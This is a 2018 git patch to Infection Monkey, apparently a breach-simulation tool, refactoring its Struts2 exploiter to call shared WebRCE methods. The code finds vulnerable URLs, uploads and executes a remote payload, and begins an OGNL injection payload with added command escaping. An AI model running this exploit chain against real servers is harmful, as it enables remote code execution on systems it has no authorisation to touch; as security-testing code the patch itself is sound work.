From 6cb058eb1d325c05687caa704d8e82c43818ef1f Mon Sep 17 00:00:00 2001
From: Vakaris <vaoxygen@gmail.com>
Date: Fri, 10 Aug 2018 15:04:23 +0300
Subject: [PATCH] Struts2 refactored for framework fixes

---
 infection_monkey/exploit/struts2.py | 26 +++++++++++---------------
 1 file changed, 11 insertions(+), 15 deletions(-)

diff --git a/infection_monkey/exploit/struts2.py b/infection_monkey/exploit/struts2.py
index 395fe422a..2b672f290 100644
--- a/infection_monkey/exploit/struts2.py
+++ b/infection_monkey/exploit/struts2.py
@@ -26,45 +26,39 @@ class Struts2Exploiter(WebRCE):
         super(Struts2Exploiter, self).__init__(host)
 
     def exploit_host(self):
-        # We need a reference to the exploiter for WebRCE framework to use
-        exploiter = self.exploit
         # Get open ports
-        ports = WebRCE.get_ports_w(self.host, self.HTTP, ["http"])
+        ports = self.get_ports_w(self.HTTP, ["http"])
         if not ports:
             return False
         # Get urls to try to exploit
-        urls = WebRCE.build_potential_urls(self.host, ports)
+        urls = self.build_potential_urls(ports)
         vulnerable_urls = []
         for url in urls:
             # Get full URL
             url = self.get_redirected(url)
-            if WebRCE.check_if_exploitable(exploiter, url):
+            if self.check_if_exploitable(url):
                 vulnerable_urls.append(url)
         self._exploit_info['vulnerable_urls'] = vulnerable_urls
         if not vulnerable_urls:
             return False
-        # We need to escape backslashes for our exploiter
-        config = copy.deepcopy(self._config)
-        config.dropper_target_path_win_32 = re.sub(r"\\", r"\\\\", config.dropper_target_path_win_32)
-        config.dropper_target_path_win_64 = re.sub(r"\\", r"\\\\", config.dropper_target_path_win_64)
 
-        if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config):
+        if self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
             LOG.info("Host %s was already infected under the current configuration, done" % self.host)
             return True
 
-        if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]):
+        if not self.set_host_arch(vulnerable_urls[0]):
             return False
 
-        data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0])
+        data = self.upload_monkey(vulnerable_urls[0])
 
         # We can't use 'if not' because response may be ''
-        if data is not False and data['response'] == False:
+        if data is not False and data['response'] is False:
             return False
 
-        if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False:
+        if self.change_permissions(vulnerable_urls[0], data['path']) is False:
             return False
 
-        if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], True) == False:
+        if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False:
             return False
 
         return True
@@ -86,6 +80,8 @@ class Struts2Exploiter(WebRCE):
         :param cmd: Code to try and execute on host
         :return: response
         """
+        cmd = re.sub(r"\\", r"\\\\", cmd)
+        cmd = re.sub(r"'", r"\\'", cmd)
         payload = "%%{(#_='multipart/form-data')." \
                   "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
                   "(#_memberAccess?" \